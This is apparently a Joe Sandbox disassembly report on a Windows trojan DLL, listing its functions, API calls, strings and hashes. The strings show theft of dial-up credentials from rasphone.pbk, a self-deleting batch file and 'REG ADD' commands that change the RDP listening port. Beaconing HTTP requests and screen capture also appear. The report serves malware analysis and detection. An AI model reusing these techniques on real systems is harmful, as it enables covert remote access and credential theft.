Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Service$Open$Manager$CloseDatabaseHandle$Lock$ControlDeleteSleep$ChangeConfigQueryStartStatusUnlock
String ID: SYSTEM\CurrentControlSet\Services\
API String ID: 1632965242-3886778518
Opcode ID: 415cbfae56c863db6d808fe5706d43c21076e051c094c4dc012044e5d47c7044
Instruction ID: 7f1d72a6b6236b21d302d541352c045c2c8a2f4db1f642aaa59284ae598933f1
Opcode Fuzzy Hash: 415cbfae56c863db6d808fe5706d43c21076e051c094c4dc012044e5d47c7044
Instruction Fuzzy Hash: F3712F31744365AFF731CB644C8AFBE76A5EB44B51F100228FA59AB2D0DFF08C858A60

Function 100074B0 Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 223stringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000105), ref: 100074C9
strchr.MSVCRT ref: 100074DE
lstrcpy.KERNEL32(00000001), ref: 100074E9
lstrcat.KERNEL32(?,?), ref: 10007501
lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 10007510
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10007520
wsprintfA.USER32 ref: 10007540
GetVersionExA.KERNEL32 ref: 1000756C
??2@YAPAXI@Z.MSVCRT(00001000), ref: 10007592
GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,?), ref: 100075C8
GetPrivateProfileStringA.KERNEL32(00000000,DialParamsUID,00000000,?,00000100,?), ref: 10007645
lstrcmp.KERNEL32(?,00000000), ref: 1000766A
lstrcpy.KERNEL32(?,00000200), ref: 100076A5
lstrcpy.KERNEL32(?,00000100), ref: 100076BA
GetPrivateProfileStringA.KERNEL32(00000000,PhoneNumber,00000000,?,00000100,?), ref: 100076EE
GetPrivateProfileStringA.KERNEL32(00000000,Device,00000000,?,00000100,?), ref: 10007706
??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,00000000,?,?), ref: 10007755
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 1000775B
??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 10007761
lstrlen.KERNEL32(00000000,?,00000000,?,?), ref: 1000776A
??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000779D

Part of subcall function 100073D0: wsprintfA.USER32 ref: 1000743C
Part of subcall function 100073D0: LsaFreeMemory.ADVAPI32(?), ref: 1000746A
Part of subcall function 100073D0: LsaFreeMemory.ADVAPI32(?), ref: 10007494

Strings

\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000750A
Device, xrefs: 10007700
%s\%s, xrefs: 1000753A
DialParamsUID, xrefs: 1000763F
Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000752D
PhoneNumber, xrefs: 100076E8
Documents and Settings\, xrefs: 100074CF

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??3@PrivateProfile$Stringlstrcpy$FreeMemorylstrcatwsprintf$??2@DirectoryFolderNamesPathSectionSpecialVersionWindowslstrcmplstrlenstrchr
String ID: %s\%s$Device$DialParamsUID$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$PhoneNumber$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
API String ID: 4167786638-3033193607
Opcode ID: 9523fa19fb7e428b8343631ba9dac47c68eb2c2225a73468dc24c4b5fb51928c
Instruction ID: f0af7ff8ab0846974cf933d747a26daa36609d74f32ab5fd33a69faa2bd6b488
Opcode Fuzzy Hash: 9523fa19fb7e428b8343631ba9dac47c68eb2c2225a73468dc24c4b5fb51928c
Instruction Fuzzy Hash: 4E8180B1504385AFE724CF14CC84FABB3E9FBC4740F004A1DF68A97251DB79A9458B66

Function 10012150 Relevance: 42.3, APIs: 19, Strings: 5, Instructions: 339stringregistrymemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 100121A0
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000040), ref: 100121D0
RegEnumKeyExA.ADVAPI32(00000040,00000000,?,?,00000000,00000000,00000000,00000000), ref: 100121F6
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 10012320
RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,00000007,00000007,?), ref: 1001234F
RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000007,?,00000001), ref: 1001236F
strstr.MSVCRT ref: 100123F4
strstr.MSVCRT ref: 1001240B
lstrlen.KERNEL32(?), ref: 10012420
lstrlen.KERNEL32(?), ref: 10012429
LocalSize.KERNEL32(00000000), ref: 10012437
LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 10012445
lstrlen.KERNEL32(?), ref: 10012456
lstrlen.KERNEL32(?), ref: 10012474
lstrlen.KERNEL32(?), ref: 10012486
lstrlen.KERNEL32(?), ref: 100124AF
RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 1001251F
RegCloseKey.ADVAPI32(00000040), ref: 10012536
LocalReAlloc.KERNEL32(00000000,00010000,00000042), ref: 10012544

Strings

Windows, xrefs: 10012405
UninstallString, xrefs: 10012369
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 1001215E
DisplayName, xrefs: 10012349
Microsoft, xrefs: 100123EE

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: lstrlen$Local$Alloc$EnumOpenQueryValuestrstr$CloseSize
String ID: DisplayName$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString$Windows
API String ID: 2254360075-2665300987
Opcode ID: 5921ea012968ccbaa212433031b476476b24bbda40d625663b2bfe521a7a65ef
Instruction ID: 0094e60b34b218b2d156cdba79d742c6c5f7379f88ed07e575cc6fad288f1158
Opcode Fuzzy Hash: 5921ea012968ccbaa212433031b476476b24bbda40d625663b2bfe521a7a65ef
Instruction Fuzzy Hash: B2B1D6B16043855BD715CF24CC90BABB7DAEFC8310F444A1DFA9997280EAB4EE49C751

Function 1000CC70 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 141stringfileprocessCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1000CD25
lstrcpy.KERNEL32(00000000,@echo off), ref: 1000CD38
lstrcat.KERNEL32(00000000,@del 3596799a1543bc9f.aqq), ref: 1000CD56
lstrcat.KERNEL32(00000000,@del "), ref: 1000CD68
lstrcat.KERNEL32(00000000,00000000), ref: 1000CD77
lstrcat.KERNEL32(00000000,"), ref: 1000CD86
lstrcat.KERNEL32(00000000,@del ), ref: 1000CD95
lstrcat.KERNEL32(00000000,?), ref: 1000CDA4
lstrcat.KERNEL32(00000000,@exit), ref: 1000CDB3
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 1000CDC9
WriteFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 1000CDE6
CloseHandle.KERNEL32(00000000), ref: 1000CDED
WinExec.KERNEL32(?,00000000), ref: 1000CDFA
ExitProcess.KERNEL32 ref: 1000CE02

Strings

@del , xrefs: 1000CD8F
afc9fe2f418b00a0.bat, xrefs: 1000CD0D
@exit, xrefs: 1000CDAD
@del ", xrefs: 1000CD62
@del 3596799a1543bc9f.aqq, xrefs: 1000CD50
", xrefs: 1000CD80
@echo off, xrefs: 1000CD32

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: lstrcat$File$CloseCreateExecExitHandleModuleNameProcessWritelstrcpy
String ID: @exit$"$@del $@del "$@del 3596799a1543bc9f.aqq$@echo off$afc9fe2f418b00a0.bat
API String ID: 433470039-873414491
Opcode ID: 4d7fb6a1bfc2b650f2c5ea7031f5b9c7acfa89c5468e2b03b9c1a4a40a83eb2a
Instruction ID: 0a7f92bd5935df41e05b6577e6ab9151d6494e46dd2793a7553bbccc7f6feb7a
Opcode Fuzzy Hash: 4d7fb6a1bfc2b650f2c5ea7031f5b9c7acfa89c5468e2b03b9c1a4a40a83eb2a
Instruction Fuzzy Hash: 15419072519790ABEB11CB60CCC5FD67BA9EF8A310F044D98E6845F044DB74B628CB93

Function 10004940 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 186stringsleepthreadCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 10004984
strstr.MSVCRT ref: 100049A6
strcspn.MSVCRT ref: 100049C8
strncpy.MSVCRT ref: 100049D7
strcspn.MSVCRT ref: 100049DF
strstr.MSVCRT ref: 100049EB
strcspn.MSVCRT ref: 10004A09
strncpy.MSVCRT ref: 10004A12
atoi.MSVCRT(?), ref: 10004A19
strcspn.MSVCRT ref: 10004A25
strstr.MSVCRT ref: 10004A32
strcspn.MSVCRT ref: 10004A54
strncpy.MSVCRT ref: 10004A5D
strcspn.MSVCRT ref: 10004A69
Sleep.KERNEL32(00000028), ref: 10004B0E
RtlExitUserThread.NTDLL(00000000), ref: 10004B1B

Strings

^*%%RFTGYHJIRTG*(&^%DFG.asp, xrefs: 10004AB1
Cache-Control: no-cacheReferer: www.qq.com, xrefs: 10004AEF
GET, xrefs: 10004AF8
http://, xrefs: 10004964, 1000498D

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: strcspn$strstr$strncpy$ExitSleepThreadUseratoi
String ID: Cache-Control: no-cacheReferer: www.qq.com$GET$^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
API String ID: 3047203434-1551478559
Opcode ID: e412d0c515886a73b93e1546e4aa2403f2198e990efffa37e164aea4bc5c3113
Instruction ID: 1c951fb19393ce52af4e69efaf2d32add5348a8144f4b5db51f252c0556f43f7
Opcode Fuzzy Hash: e412d0c515886a73b93e1546e4aa2403f2198e990efffa37e164aea4bc5c3113
Instruction Fuzzy Hash: 715127325102601BD704DAB48C409DF7B9AEFC6250F02461DFA9697190DE68EA4987EA

Function 1000FB90 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00000000), ref: 1000FC53

Part of subcall function 10010520: ReleaseDC.USER32(?,?), ref: 1001053A
Part of subcall function 10010520: GetDesktopWindow.USER32 ref: 10010540
Part of subcall function 10010520: GetDC.USER32(00000000), ref: 1001054D

GetDesktopWindow.USER32 ref: 1000FCA2
GetDC.USER32(00000000), ref: 1000FCAF
GetTickCount.KERNEL32 ref: 1000FCC3
GetSystemMetrics.USER32(00000000), ref: 1000FCED
GetSystemMetrics.USER32(00000001), ref: 1000FCF4
CreateCompatibleDC.GDI32(?), ref: 1000FD12
CreateCompatibleDC.GDI32(?), ref: 1000FD1B
CreateCompatibleDC.GDI32(00000000), ref: 1000FD24
CreateCompatibleDC.GDI32(00000000), ref: 1000FD2A
CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 1000FD89
CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 1000FD9A
CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 1000FDAE
SelectObject.GDI32(?,?), ref: 1000FDC4
SelectObject.GDI32(?,?), ref: 1000FDCE
SelectObject.GDI32(?,?), ref: 1000FDDE
SetRect.USER32(00000034,00000000,00000000,?,?), ref: 1000FDEE
??2@YAPAXI@Z.MSVCRT(00000002), ref: 1000FDFD

Strings

I=u, xrefs: 1000FCD9

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$??2@CountCursorLoadRectReleaseTick
String ID: I=u
API String ID: 339399666-3032091488
Opcode ID: 95fef00004b0c454b9c3dee54ddf510e5743c9dddf09359fd0f5be7a5ad76e64
Instruction ID: 3f0a5bb4dce6945fbb730085926d6daddf735a738384ac0d5d646b014a7e3649
Opcode Fuzzy Hash: 95fef00004b0c454b9c3dee54ddf510e5743c9dddf09359fd0f5be7a5ad76e64
Instruction Fuzzy Hash: 6681E3B0504B459FE320CF69C884A27FBE9FB88704F004A1DE59A87B50DBB9F8458F91

Function 10009130 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 120stringCOMMON

Download Yara Rule

APIs

Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C

lstrlen.KERNEL32(?,?,?,?,?,?,?,00000001), ref: 100091B1
lstrcat.KERNEL32(?,rar.exe), ref: 100091ED
PathIsDirectoryA.SHLWAPI(?), ref: 100091F0
lstrcpy.KERNEL32(?,?), ref: 10009209
lstrcat.KERNEL32(?,.rar), ref: 10009218
lstrcpy.KERNEL32(?,?), ref: 10009220
lstrcat.KERNEL32(?,1007A0CC), ref: 1000922C
wsprintfA.USER32 ref: 10009248
lstrcpy.KERNEL32(?,?), ref: 1000926C
PathRemoveExtensionA.SHLWAPI(?,?,?,?,?,?,?,00000001), ref: 10009277
lstrcat.KERNEL32(?,.rar), ref: 10009287
wsprintfA.USER32 ref: 1000929C
ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 100092C0

Strings

rar.exe, xrefs: 100091E7
open, xrefs: 100092B9
WinRAR\shell\open\command, xrefs: 10009195
a %s %s, xrefs: 10009296
.rar, xrefs: 10009212, 10009281
a -r %s %s, xrefs: 10009242

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Pathwsprintf$DirectoryExecuteExtensionOpenRemoveShelllstrlen
String ID: .rar$WinRAR\shell\open\command$a %s %s$a -r %s %s$open$rar.exe
API String ID: 1594156495-1032977547
Opcode ID: b9f267640147a2f838cf6fb1a9db996f7ba10a8c87d01a4d513f73deca81dfce
Instruction ID: afa0eefc70f7be5220eaeba01fbc78bff8034a503fb8c3defdcf7e753fe2bb58
Opcode Fuzzy Hash: b9f267640147a2f838cf6fb1a9db996f7ba10a8c87d01a4d513f73deca81dfce
Instruction Fuzzy Hash: A64162B2104399AEE724DBA0CC84FEB77ADEBD4704F008D1CF785A7140DA74A609CB66

Function 1000B420 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 212fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 1000B44D
atoi.MSVCRT(?), ref: 1000B46C
CreateFileA.KERNEL32(c:\3389.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000B4A0
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B530
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B54C
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 1000B570

Strings

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B577
/f , xrefs: 1000B4D3, 1000B5AA
del %0, xrefs: 1000B630
C:\3389.bat, xrefs: 1000B68A
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B4AB
c:\3389.bat, xrefs: 1000B49B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: File$Write$Createatoimalloc
String ID: /f $C:\3389.bat$REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d $REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d $c:\3389.bat$del %0
API String ID: 664794413-4273509073
Opcode ID: 4a27424fdb0e6fed942fe30b310200175d70302a2057ec4e7743d62d519ea0e6
Instruction ID: fb98ae05d316c3fd0aebd7eca0209f5c260241d4b25d467fdc2f7558c52bb64f
Opcode Fuzzy Hash: 4a27424fdb0e6fed942fe30b310200175d70302a2057ec4e7743d62d519ea0e6
Instruction Fuzzy Hash: B961B2721147846AE324CB74CC45BFB77E9EBC8310F104E2DF796932D1DAB9AA088B55

Function 1000D640 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 202libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D68F
GetProcAddress.KERNEL32(00000000,socket), ref: 1000D6A3
GetProcAddress.KERNEL32(00000000,recv), ref: 1000D6AF
GetProcAddress.KERNEL32(00000000,connect), ref: 1000D6BB
GetProcAddress.KERNEL32(00000000,getsockname), ref: 1000D6C7
GetProcAddress.KERNEL32(00000000,select), ref: 1000D6D3
GetLastError.KERNEL32(00000000), ref: 1000D6F0
GetLastError.KERNEL32(00000000), ref: 1000D740

Strings

socket, xrefs: 1000D69D
getsockname, xrefs: 1000D6BD
ws2_32.dll, xrefs: 1000D65A
select, xrefs: 1000D6C9
connect, xrefs: 1000D6B1
recv, xrefs: 1000D6A5

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$LibraryLoad
String ID: connect$getsockname$recv$select$socket$ws2_32.dll
API String ID: 1969025732-1466708075
Opcode ID: 4869f2540624f0de57036062d3a6f7b94b0a05a06f79d3c308fa5c7f5636398a
Instruction ID: 9eea021e2679a54889db195b2b8dea17cea3e2387c884d07e69dbabe29e95218
Opcode Fuzzy Hash: 4869f2540624f0de57036062d3a6f7b94b0a05a06f79d3c308fa5c7f5636398a
Instruction Fuzzy Hash: EB716E716083419BE310DF64C884A5FBBE5FFC8354F108A2EF58987290E775D845CB66

Function 10004790 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 148libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(wininet.dll), ref: 100047A3
GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 100047C1
GetProcAddress.KERNEL32(00000000,InternetConnectA), ref: 100047CB
GetProcAddress.KERNEL32(00000000,HttpOpenRequestA), ref: 100047D7
GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 100047E3
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 100047EF
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 100047FB
printf.MSVCRT ref: 100048EB
FreeLibrary.KERNEL32(00000000), ref: 1000491A

Strings

InternetOpenA, xrefs: 100047BB
InternetReadFile, xrefs: 100047F1
InternetCloseHandle, xrefs: 100047E5
InternetConnectA, xrefs: 100047C3
HTTP/1.1, xrefs: 10004860
HttpOpenRequestA, xrefs: 100047CD
wininet.dll, xrefs: 1000479A
Hackeroo, xrefs: 10004805
HttpSendRequestA, xrefs: 100047D9

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadprintf
String ID: HTTP/1.1$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$wininet.dll
API String ID: 2425834421-3882969375
Opcode ID: ab2da8832e121b78344de6fdb46b171ab1ca8c0203973e7725e5a9d28d361bfa
Instruction ID: 681ed2cf8dfbe48c2289dcdc3772bf4013358cff2fe0b36028245d622f2c89cd
Opcode Fuzzy Hash: ab2da8832e121b78344de6fdb46b171ab1ca8c0203973e7725e5a9d28d361bfa
Instruction Fuzzy Hash: 1E41D271504344ABE220DF658C44FAFBBE8EBC5B50F40491DF68567180DBB8E9048B9A

Function 10011260 Relevance: 30.1, APIs: 20, Instructions: 85pipesleepthreadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011277
Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 10011281
TerminateProcess.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011289
TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011295
Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 10011299
WaitForSingleObject.KERNEL32(?,000007D0,?,?,?,10009D95,?), ref: 100112A4
TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 100112B0
Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 100112B4
DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112C4
DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112CE
DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112D8
DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112E2
CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112EE
CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112F4
CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112FA
CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011300
CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011306
CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 1001130C
CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011312
CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011318

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

